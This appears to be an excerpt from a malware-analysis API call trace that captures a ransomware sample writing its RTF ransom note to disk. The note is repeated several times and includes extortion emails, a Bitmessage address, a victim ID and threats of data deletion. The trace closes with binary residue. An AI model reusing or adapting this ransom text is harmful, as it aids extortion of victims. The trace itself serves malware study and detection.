y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.323] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.324] CloseHandle (hObject=0x2e8) returned 1 [0289.324] GetFileAttributesW 